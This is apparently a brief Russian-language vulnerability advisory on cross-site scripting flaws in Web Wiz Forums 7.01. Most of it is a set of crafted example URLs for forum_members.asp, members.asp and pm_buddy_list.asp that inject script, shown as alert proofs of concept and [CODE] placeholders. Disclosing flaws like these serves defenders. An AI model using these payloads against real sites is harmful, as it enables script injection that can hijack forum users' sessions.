Программа: Web Wiz Forums ver. 7.01 

Уязвимость обнаружена в Web Wiz Forums. Удаленный пользователь может выполнить XSS нападение.
Уязвимость обнаружена в нескольких параметрах в сценариях forum_members.asp, members.asp, pm_buddy_list.asp и search.asp. 

Пример/Эксплоит: 

http://[TARGET]/ forum_members.asp?find=%22;} [CODE];function%20x(){v%20=%22

http://[TARGET]/ forum_members.asp?find=%22;} ALERT(‘XSS atack by [HEX] (c) [CSL]’);function%20x(){v%20=%22

http://[TARGET]/ members.asp?SF=%22;}[CODE] function%20x(){v%20=%22 

http://[TARGET]/ members.asp?SF=%22;}ALERT(‘ XSS atack by [HEX] (c) [CSL]’);function%20x(){v%20=%22

http://[TARGET]/ pm_buddy_list.asp?name=A& desc=B%22%3E[CODE]%3Ca%20s=%22&code=1

http://[TARGET]/ pm_buddy_list.asp?name=A& desc=B%22%3E<SCRIPT>ALERT(‘XSS atack by
[HEX] (c) [CSL]’);</SCRIPT>%3Ca%20s=%22&code=1



Оставить мнение